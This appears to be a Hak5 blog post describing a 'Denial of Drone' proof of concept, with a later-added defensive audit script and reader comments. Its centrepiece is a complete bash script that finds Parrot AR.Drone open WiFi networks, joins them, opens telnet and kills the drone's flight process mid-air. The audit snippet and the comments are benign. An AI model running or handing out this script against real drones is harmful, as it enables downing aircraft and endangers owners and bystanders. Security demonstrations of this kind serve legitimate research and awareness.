
Drone Hacking from an airborne WiFi Pineapple this time on Hak5.


Youtube Hak5 1518.1: http://youtu.be/Fk1Bpy5ccPU
Youtube Hak5 1518.2: http://youtu.be/xKfY0PmKDRE

Drone Hacking from an airborne WiFi Pineapple – this time on Hak5. Darren demonstrates his proof of concept “Denial of Drone” attack targeting the Parrot AR.Drone from a WiFi Pineapple-equipped DJI Phantom 2 Vision. Inspired by Samy Kamkar’s Raspberry Pi-based Skyjacking demo, this drone killer PoC takes a backdoor approach without the need to deauth clients.

Here’s the quick and dirty shell script. The only dependency is “empty” – a TCL/expect clone that uses stdin/out for process automation.

#!/bin/bash
#dronepwn.sh version 0.1 by Darren Kitchen – absolutely horrible code. Do not use under any circumstance. Send all flame mail to hak5.org

while true; do
    if ! ( iw wlan0 scan | grep SSID | awk '{print $2}' | grep [a]rdrone ); then
        echo "No Drones Found"
    else
        echo "Drone Found! Attempting to connect"
        DRONESSID=`iw wlan0 scan | grep SSID | awk '{print $2}' | grep [a]rdrone`
        iwconfig wlan1 essid $DRONESSID
        sleep 2

        echo "Testing Wireless Association"
        if ! ( iwconfig wlan1 | grep $DRONESSID ); then
            echo "Association to $DRONESSID failed"
        else
            echo "Association to $DRONESSID successful"

            echo "Setting Static IP Address"
            ifconfig wlan1 192.168.1.5 netmask 255.255.255.0 up
            sleep 2

            echo "Testing IP Connection"
            if ! ( ping -c1 192.168.1.1 | grep from ); then
                echo "IP Connection Failed"
            else
                echo "IP Connection Successful"
                echo "Connecting to Telnet and sending kill command. Banzai!"
                empty -f -i /tmp/drone_input.fifo -o /tmp/drone_output.fifo -p /tmp/drone_empty.pid telnet 192.168.1.1
                empty -w -i /tmp/drone_output.fifo -o /tmp/drone_input.fifo BusyBox "kill -KILL \`pidof program.elf\`\n"
                kill `pidof empty`
                echo ""
                echo "Kill command sent. Splash one drone"
                echo ""

            fi
        fi
    fi

    sleep 60
done
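
The script above only works because it can associate with the drone's SSID without a key (`iwconfig wlan1 essid $DRONESSID`). The following is an added example, not part of the original post or Hak5's code: a defender-side audit that parses `iw` scan output and reports whether each "ardrone" access point advertises any link-layer protection. The function names and the sample scan data are constructed for illustration.

```shell
#!/bin/bash
# Added example, not from the original post: audit `iw wlan0 scan` output for
# AR.Drone-style access points that advertise no link-layer protection.

# Constructed sample scan output; every BSSID and SSID below is made up.
sample_scan() {
cat <<'EOF'
BSS 02:00:00:00:00:01(on wlan0)
    freq: 2437
    capability: ESS (0x0421)
    signal: -48.00 dBm
    SSID: ardrone2_012345
BSS 02:00:00:00:00:02(on wlan0)
    freq: 2412
    capability: ESS Privacy ShortSlotTime (0x0411)
    SSID: ardrone2_secured
    RSN:     * Version: 1
BSS 02:00:00:00:00:03(on wlan0)
    freq: 2462
    capability: ESS (0x0401)
    SSID: CoffeeShop
EOF
}

# Reads scan text on stdin; prints "<ssid> <bssid> OPEN|protected" for each
# BSS whose SSID contains "ardrone" (matched case-insensitively here).
audit_scan() {
    awk '
    function report() {
        if (bssid != "" && tolower(ssid) ~ /ardrone/)
            printf "%s %s %s\n", ssid, bssid, (protected ? "protected" : "OPEN")
    }
    /^BSS / { report(); bssid = substr($2, 1, 17); ssid = ""; protected = 0; next }
    { sub(/^[ \t]+/, "") }                      # iw indents the per-BSS fields
    /^SSID: /                { ssid = substr($0, 7) }
    /^(RSN|WPA):/            { protected = 1 }  # WPA2 / WPA information element
    /^capability:.* Privacy/ { protected = 1 }  # privacy bit (also set for WEP)
    END { report() }
    '
}

# Demo on the constructed sample; on real hardware: iw wlan0 scan | audit_scan
sample_scan | audit_scan
```

A "protected" result means only that the beacon advertises encryption; it says nothing about what is reachable on 192.168.1.1 once a client has associated.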

5 Comments

  • Jack K. 1 year ago

    W O W !
    You folks have outdone yourselves.
    This is ssooooo HOT!
    I can not wait to see what is next.

    ppuuuuuuurrrrrrrrrrrrrrrrfect

  • Nick Landry 1 year ago

    Think about this….. respawner must be killed first as to guarantee that the process is dead before it is even killed.

    Love the show.

  • To make this build compatible with the existing Pineapple Scripts (e.g. http://wifipineapple.com/wp4.sh), you need to replace the existing OpenWrt configurations with the ones listed below.

  • Joe Viocoe 10 months ago

    What?… no Dead Parrot skit?

  • D.Williamz 8 months ago

    Loved this show! Watching every week and keep up the great work!